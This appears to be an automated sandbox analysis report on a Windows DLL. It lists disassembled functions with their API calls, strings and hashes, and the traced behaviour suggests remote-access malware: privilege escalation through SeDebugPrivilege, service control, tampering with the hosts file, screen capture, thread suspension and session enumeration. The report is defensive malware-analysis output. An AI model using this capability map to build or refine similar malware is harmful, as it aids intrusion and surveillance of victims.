                                                  • Instruction Fuzzy Hash: FA210731204750AFE310CB68CC95BEBB7D9FB89350F444A2CF649972D0DA755A05CBA2
                                                  APIs
                                                    • Part of subcall function 1001B690: GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                    • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 10019871
                                                  • OpenServiceA.ADVAPI32(00000000,?,00000034), ref: 100198A9
                                                  • QueryServiceStatus.ADVAPI32(00000000,?), ref: 100198B7
                                                  • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 100198DA
                                                  • ControlService.ADVAPI32(00000000,00000001,?), ref: 100198ED
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 100198FA
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 100198FD
                                                  • Sleep.KERNEL32(000000C8), ref: 10019904
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$Open$CloseHandleProcess$ControlCurrentManagerQuerySleepStartStatusToken
                                                  • String ID: SeDebugPrivilege
                                                  • API String ID: 3878120848-2896544425
                                                  • Opcode ID: 3686d3d753bd6d724ea35e6a9d07ba9d6be5f52da5a1c1b2a9d2d1cb915500a3
                                                  • Instruction ID: 50e31cc6d71f3cb09cdeb76e9080be0a7887b9f28361484d1c1b8db58f74100a
                                                  • Opcode Fuzzy Hash: 3686d3d753bd6d724ea35e6a9d07ba9d6be5f52da5a1c1b2a9d2d1cb915500a3
                                                  • Instruction Fuzzy Hash: C721EB352502146BE714EB609C8AFBF77D4FB88350F15061AFA0A9A1C0EEB4AD448665
                                                  APIs
                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 100296A0
                                                  • GetCurrentProcess.KERNEL32(?), ref: 100296AB
                                                  • IsWow64Process.KERNEL32(00000000), ref: 100296B2
                                                  • SetFileAttributesA.KERNEL32(?,00000080), ref: 100296FD
                                                  • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 10029717
                                                  • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 1002973C
                                                  • CloseHandle.KERNEL32(00000000), ref: 10029745
                                                  Strings
                                                  • \sysnative\drivers\etc\hosts, xrefs: 100296C2
                                                  • \system32\drivers\etc\hosts, xrefs: 100296C9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Process$AttributesCloseCreateCurrentDirectoryHandleWindowsWow64Write
                                                  • String ID: \sysnative\drivers\etc\hosts$\system32\drivers\etc\hosts
                                                  • API String ID: 4291671391-1011561390
                                                  • Opcode ID: 2adefefbe028c6965658248b5395f428dfa06602fd6f54fb6328fb5b9b7a67e1
                                                  • Instruction ID: c6005bee7c224514f3309a3699cccf42982a6e54c45629d08b6c9908a2ddda91
                                                  • Opcode Fuzzy Hash: 2adefefbe028c6965658248b5395f428dfa06602fd6f54fb6328fb5b9b7a67e1
                                                  • Instruction Fuzzy Hash: 5B21C5352043056BE324DB78DC49F9B7B98FB84720F144F2CFA96A72D0DAB09D0987A1
                                                  APIs
                                                  • #2614.MFC42(?,?,10007AFF), ref: 10008084
                                                  • #860.MFC42(*.*,?,?,10007AFF), ref: 10008091
                                                  • #3811.MFC42(?,*.*,?,?,10007AFF), ref: 100080B2
                                                  • #3811.MFC42(?,?,*.*,?,?,10007AFF), ref: 100080C1
                                                  • #3811.MFC42(?,?,?,*.*,?,?,10007AFF), ref: 100080D0
                                                  • #3811.MFC42(?,?,?,?,*.*,?,?,10007AFF), ref: 100080DF
                                                  • #3811.MFC42(?,?,?,?,?,*.*,?,?,10007AFF), ref: 100080EE
                                                  • #3811.MFC42(?,?,?,?,?,?,*.*,?,?,10007AFF), ref: 100080FD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #3811$#2614#860
                                                  • String ID: *.*
                                                  • API String ID: 4293058641-438819550
                                                  • Opcode ID: 9a1bd5b303f82e1101b9f388daf2ff61e48d11c0f8e37bea33aad176008b9ec5
                                                  • Instruction ID: 666ce54a2a265a37b10a0135446347dcc930d7d9a3e7cb816894ca7fb184fd78
                                                  • Opcode Fuzzy Hash: 9a1bd5b303f82e1101b9f388daf2ff61e48d11c0f8e37bea33aad176008b9ec5
                                                  • Instruction Fuzzy Hash: 5D11B3B5404B059FC7A4CFA5D681946BBE5FE886007848A2EA18AC7A24E770F504DF50
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,MultiByteToWideChar,.23,00000000,?,00000000,10005979,?,?), ref: 100059E4
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100059ED
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrlenA,?,00000000,10005979,?,?), ref: 100059FB
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100059FE
                                                  • malloc.MSVCRT ref: 10005A1F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc$malloc
                                                  • String ID: .23$KERNEL32.dll$MultiByteToWideChar$lstrlenA
                                                  • API String ID: 1625907898-566195008
                                                  • Opcode ID: 5775f1e7eb7e2f5d9e18227d5eded49f95364944b1adf940be7b042424f80c18
                                                  • Instruction ID: cce5c33cb54e4e20ebcd19e924e9cf720d43bdeab14a6bb2b58a7cbeabffb214
                                                  • Opcode Fuzzy Hash: 5775f1e7eb7e2f5d9e18227d5eded49f95364944b1adf940be7b042424f80c18
                                                  • Instruction Fuzzy Hash: A5F0C8E25403196BE620ABB48C46E7BB7ECEF85351F05482AF545D3240DA68E8008771
                                                  APIs
                                                    • Part of subcall function 10018A20: ReleaseDC.USER32(00000000,?), ref: 10018A38
                                                    • Part of subcall function 10018A20: GetDC.USER32(00000000), ref: 10018A40
                                                  • GetCursorPos.USER32(?), ref: 10018246
                                                  • GetSystemMetrics.USER32(00000000), ref: 10018255
                                                  • _ftol.MSVCRT ref: 10018273
                                                  • _ftol.MSVCRT ref: 10018288
                                                  • GetCursorInfo.USER32(?,?,00000008), ref: 100182AE
                                                  • DestroyCursor.USER32(?), ref: 100182D9
                                                  • BitBlt.GDI32(?,00000000,00000000,10016B8A,?,?,00000000,00000000,?), ref: 1001831C
                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 10018373
                                                  • Sleep.KERNEL32(00000001), ref: 10018393
                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 1001839C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Cursor$CounterPerformanceQuery_ftol$DestroyInfoMetricsReleaseSleepSystem
                                                  • String ID:
                                                  • API String ID: 2306850792-0
                                                  • Opcode ID: bb3ab1a7d1fb864ae3465332f95efda82989cf761ace87dd28a93c5291d193c7
                                                  • Instruction ID: ed20b3c1f5c79fd808ca28f3e705cb4aa4f98cfa336912cfc5d34cc1cf5afb6b
                                                  • Opcode Fuzzy Hash: bb3ab1a7d1fb864ae3465332f95efda82989cf761ace87dd28a93c5291d193c7
                                                  • Instruction Fuzzy Hash: 43517B75204B019FE324DF29C890B5BB7E5FB88700F544A1DF6A69B290E770FA85CB61
                                                  APIs
                                                  • ReleaseDC.USER32(00000000,?), ref: 10018034
                                                  • DeleteDC.GDI32(?), ref: 10018044
                                                  • DeleteDC.GDI32(?), ref: 1001804A
                                                  • DeleteDC.GDI32(?), ref: 10018050
                                                  • DeleteObject.GDI32(?), ref: 1001805C
                                                  • DeleteObject.GDI32(?), ref: 10018062
                                                  • #825.MFC42(?,?,?,?,?,?,?,10098B7C,000000FF,10017FE8), ref: 10018083
                                                  • #825.MFC42(?,?,?,?,?,?,?,10098B7C,000000FF,10017FE8), ref: 10018093
                                                  • #825.MFC42(?,?,?,?,?,?,?,10098B7C,000000FF,10017FE8), ref: 100180A3
                                                  • DestroyCursor.USER32(?), ref: 100180C9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Delete$#825$Object$CursorDestroyRelease
                                                  • String ID:
                                                  • API String ID: 719826280-0
                                                  • Opcode ID: 90877511eecfd0b4e7a431cebd02d7416917aa731a6839dde4062e1f4328a9cd
                                                  • Instruction ID: ee9c09a91b7e4212c511851f40033770f7d05fd05274aa2e52ec135f7c4494b2
                                                  • Opcode Fuzzy Hash: 90877511eecfd0b4e7a431cebd02d7416917aa731a6839dde4062e1f4328a9cd
                                                  • Instruction Fuzzy Hash: 8921BFB6600B049BE620DF65CC80B57B3ECFF88610F050A1DE59A97790CB79F9048BA1
                                                  APIs
                                                    • Part of subcall function 1002BE50: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1002BE71
                                                    • Part of subcall function 1002BE50: Process32First.KERNEL32(00000000,00000000), ref: 1002BE8B
                                                    • Part of subcall function 1002BE50: _strcmpi.MSVCRT ref: 1002BEA7
                                                    • Part of subcall function 1002BE50: Process32Next.KERNEL32(00000000,?), ref: 1002BEB6
                                                    • Part of subcall function 1002BE50: CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 1002BEC0
                                                  • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 1002C3E2
                                                  • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 1002C3FC
                                                  • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 1002C422
                                                  • #823.MFC42(?), ref: 1002C42F
                                                  • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 1002C451
                                                  • #823.MFC42(00000100), ref: 1002C473
                                                  • LookupAccountSidA.ADVAPI32(00000000,00000000,00000000,00000100,?,00000104,?), ref: 1002C4A3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Token$#823InformationOpenProcessProcess32$AccountCloseCreateFirstHandleLookupNextSnapshotToolhelp32_strcmpi
                                                  • String ID: explorer.exe
                                                  • API String ID: 1409679202-3187896405
                                                  • Opcode ID: cdf207af64fab364c8e5cf922331446714e2d043d2f38fccba7b385bc9961bc5
                                                  • Instruction ID: 473375eb415be4f23099c9e5e37f9ddbe1d6da3e806a8c1c49872e14675b6481
                                                  • Opcode Fuzzy Hash: cdf207af64fab364c8e5cf922331446714e2d043d2f38fccba7b385bc9961bc5
                                                  • Instruction Fuzzy Hash: D2412CB6D00228AFDB51EF99EC85FEEBBB8FB48710F10415AF509A3240D6715A40CFA0
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: sprintfwsprintf$FileModuleName
                                                  • String ID: %s:%d
                                                  • API String ID: 2407558147-1029262843
                                                  • Opcode ID: 4e342fc3f57c5e074e26199708c80d15a31906d0826d7aae7665ec2974992b8a
                                                  • Instruction ID: 77b7dd79da85489e54b5b7ef541410886de007a4123772645864e759c8bd0851
                                                  • Opcode Fuzzy Hash: 4e342fc3f57c5e074e26199708c80d15a31906d0826d7aae7665ec2974992b8a
                                                  • Instruction Fuzzy Hash: 402129794042096FD224D724DC84FEBB3EDEFD4300F45492DF69853140EBB46A46CB96
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 10026C36
                                                  • lstrcatA.KERNEL32(?,?), ref: 10026C48
                                                  • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000003,00000080,00000000), ref: 10026C65
                                                  • SetFilePointer.KERNEL32(00000000,?,?,00000000), ref: 10026C76
                                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 10026C93
                                                  • CloseHandle.KERNEL32(00000000), ref: 10026C9A
                                                  • LocalFree.KERNEL32(?), ref: 10026CCA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateDirectoryFreeHandleLocalPointerSystemWritelstrcat
                                                  • String ID: p
                                                  • API String ID: 3379061965-2181537457
                                                  • Opcode ID: dff563a2350ad42211304f3934d3364c625aae18de2b9c5e09d3b81c4ae3f541
                                                  • Instruction ID: 60c71b90a0802acaa0e5dbf25da7476a72f7519069fb5f0452f7d82c481299c6
                                                  • Opcode Fuzzy Hash: dff563a2350ad42211304f3934d3364c625aae18de2b9c5e09d3b81c4ae3f541
                                                  • Instruction Fuzzy Hash: 8621DE75244305ABE310DF58CC85FDBB7E8FBC8704F044A1DF68996190D774A608CBA2
                                                  APIs
                                                    • Part of subcall function 100290C0: GetCurrentProcess.KERNEL32(00000028), ref: 100290D0
                                                    • Part of subcall function 100290C0: OpenProcessToken.ADVAPI32(00000000), ref: 100290D7
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 100291FA
                                                  • Thread32First.KERNEL32(00000000,0000001C), ref: 1002920B
                                                  • OpenThread.KERNEL32(001F03FF,00000000,?,?,?,00000000,0000001C,00000004,00000000), ref: 10029240
                                                  • SuspendThread.KERNEL32(00000000,?,?,00000000,0000001C,00000004,00000000), ref: 10029245
                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000,0000001C,00000004,00000000), ref: 10029248
                                                  • Thread32Next.KERNEL32(00000000,?), ref: 10029254
                                                  • CloseHandle.KERNEL32(00000000,00000000,0000001C,00000004,00000000), ref: 10029260
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandleOpenProcessThreadThread32$CreateCurrentFirstNextSnapshotSuspendTokenToolhelp32
                                                  • String ID: SeDebugPrivilege
                                                  • API String ID: 3882456823-2896544425
                                                  • Opcode ID: 21207cfc81d0fa30fd38e5c79fccdacdf40486e218a730a008db783386ba6bf6
                                                  • Instruction ID: 0dba8d27cde3c0ec8bc65889917dbe9669003c362c892a02e3719d3f6e3c27b7
                                                  • Opcode Fuzzy Hash: 21207cfc81d0fa30fd38e5c79fccdacdf40486e218a730a008db783386ba6bf6
                                                  • Instruction Fuzzy Hash: A201A135201314BFE600DB559C81FAFB3E8FFC5650F854919FA4457280E771AD08CBA6
                                                  APIs
                                                  • WTSQuerySessionInformationA.WTSAPI32(00000000,?,00000010,?,?,?,?,?,?,?), ref: 10024B60
                                                  • WTSFreeMemory.WTSAPI32(?,00000000,?,00000010,?,?,?,?,?,?,?), ref: 10024B80
                                                  • WTSFreeMemory.WTSAPI32(?,00000000,?,00000010,?,?,?,?,?,?,?), ref: 10024B94
                                                  • WTSFreeMemory.WTSAPI32(?,00000000,?,00000010,?,?,?,?,?,?,?), ref: 10024BA8
                                                  • WTSFreeMemory.WTSAPI32(?,00000000,?,00000010,?,?,?,?,?,?,?), ref: 10024BBB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeMemory$InformationQuerySession
                                                  • String ID: Console$ICA$RDP
                                                  • API String ID: 2964284127-2419630658
                                                  • Opcode ID: 0b2323dddc9a2d9ea3f3765d10de65ae570c9d2cec0aafa0406f992b21ef4394
                                                  • Instruction ID: 969729b71c1efb95c3881a1fa7dc888f36de69f465288503b8c6abb24bd41a19
                                                  • Opcode Fuzzy Hash: 0b2323dddc9a2d9ea3f3765d10de65ae570c9d2cec0aafa0406f992b21ef4394
                                                  • Instruction Fuzzy Hash: 2E01F5B6618221678504EB9CBC418ABB2F8EB94A55F49442AF948D7200E630ED1CCBF6
                                                  APIs
                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00020019,?), ref: 1002AE32
                                                  • RegQueryValueExA.ADVAPI32(00000050,Favorites,00000000,00000000,00000000,00000050), ref: 1002AE53
                                                  • RegCloseKey.ADVAPI32(?), ref: 1002AE5E
                                                  • LocalAlloc.KERNEL32(00000040,00002710), ref: 1002AE6B
                                                    • Part of subcall function 1002AB10: lstrcatA.KERNEL32(00000000,?), ref: 1002AB66
                                                    • Part of subcall function 1002AB10: lstrcatA.KERNEL32(00000000,\*.*), ref: 1002AB75
                                                    • Part of subcall function 1002AB10: FindFirstFileA.KERNEL32(00000000,?), ref: 1002AB91
